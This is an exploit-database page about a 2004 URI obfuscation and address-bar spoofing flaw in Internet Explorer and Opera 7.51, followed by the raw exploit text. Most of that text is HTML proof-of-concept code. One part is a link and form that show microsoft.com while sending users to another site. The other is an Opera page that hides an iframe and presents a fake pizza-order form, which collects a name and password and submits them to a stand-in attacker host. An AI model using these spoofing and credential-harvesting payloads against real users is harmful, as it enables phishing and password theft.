header-logo
Suggest Exploit
vendor:
Internet Explorer, Opera
by:
bitlance
5.5
CVSS
MEDIUM
URI Obfuscation
200
CWE
Product Name: Internet Explorer, Opera
Affected Version From: Microsoft Internet Explorer, Opera
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:microsoft:internet_explorer, cpe:/a:opera:opera_browser
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux, Mac
2004

URI Obfuscation Vulnerability in Microsoft Internet Explorer and Opera

An attacker can obfuscate the URI of a link in Microsoft Internet Explorer and Opera, which can lead to the impersonation of legitimate websites and the theft of sensitive information from users. This vulnerability allows an attacker to redirect users to an attacker-controlled site.

Mitigation:

Users should ensure they are visiting legitimate websites by double-checking the URL and using trusted bookmarks. Keeping browsers and security software up to date can also help prevent this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10517/info

A weakness is reported in Microsoft Internet Explorer and Opera allowing an attacker to obfuscate the URI of a link. This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users.

An attacker may exploit this weakness to make a user think they are visiting a legitimate site, when in reality they are being redirected to an attacker controlled site.

Update: an attacker may be able to use this issue to bypass zone restrictions in Internet Explorer.

Opera 7.51 is also affected.


!-- 10.06.04 courtesy of: bitlance bitlance_3@hotmail.com -->
<a title=" http://www.microsoft.com" href="http://www.microsoft.com">
<table>
<caption>
<a href="http://www.microsoft.com">
<label for="foo">
<u style="cursor: pointer; color: blue">
http://www.microsoft.com
</u>
</label>
</a>
<form method="get" action="http://www.microsoft.com%2F redir=www.e-gold.com">

<input id="foo" type="image" height="0" width="0">
</form>

Regular URIs are also vulnerable:
<a href="http://www.microsoft.com%2F redir=www.e-gold.com">test</a>

The following proof of concept is available for Opera:
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
content="0;url=javascript:(function(){})();"]
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[/script]
[style type="text/css"]
[!-- /* hide iframe element. */
iframe {
display: none !important;
}
/* hide iframe element. */ --]
[!-- /* pizza form */
body {
margin-left: 2em;
margin-right: 2em;
font-family:verdana;
font-size:80%;
}
h1 { font-size:120%;}
h2 { font-size:100%;}
table { font-size:85%; background-color:buttonface; }
table caption {
background-color:activecaption; color:captiontext;
font-weight:bold; text-align:left; }
table table { font-size:100%; }
table input { font-family:verdana; font-size:100%; }
table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[/style]
[/head]
[body]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need
Online"]
Opera 7.51[/a], Everything You Need Online
[/p]
[iframe title="inline frame spoofing address bar"
src="https://pizza.opera.com/order.html"]
This inline frame is hidden. See CSS.
[/iframe]
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
[td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
[td][input type="text" name="txtName" id="txtName"][/td]
[/tr]
[tr valign="top"]
[td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
[td][input type="password" name="txtPassword" id="txtPassword"][/td]
[/tr]
[tr valign="top"]
[td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
[td]
[select name="selSize" id="selSize"]
[option value="0"]--- pick a size --- [/option]
[option value="1"]Small[/option]
[option value="2"]Medium[/option]
[option value="3"]Large[/option]
[/select]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstCrust"]
[legend]Crust[/legend]
[table cellpadding="1" cellspacing="0"]
[tr]
[td][input type="radio" name="radCrust" id="radCrust_Thick"
value="Thick"][/td]
[td][label for="radCrust_Thick"
accesskey="K"]Thic[u]k[/u][/label][/td]
[td][input type="radio" name="radCrust" id="radCrust_Thin"
value="Thin"][/td]
[td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
[/tr]
[/table]
[/fieldset]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstToppings"]
[legend]Toppings[/legend]
[table cellpadding="1" cellspacing="0"]
[tr]
[td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
[td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
[/tr]
[tr]
[td][input type="checkbox" name="chkPineapple" id="chkPineapple"
value="Pineapple"][/td]
[td][label for="chkPineapple"
accesskey="I"]P[u]i[/u]neapple[/label][/td]
[/tr]
[tr]
[td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese"
value="Extra Cheese"][/td]
[td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra
Cheese[/label][/td]
[/tr]
[/table]
[/fieldset]
[/td]
[/tr]
[tr valign="top"]
[td colspan="2" align="right"][input type="submit" value=" Order!
"][/td]
[/tr]
[/table]
[/form]
[/body]
[/html]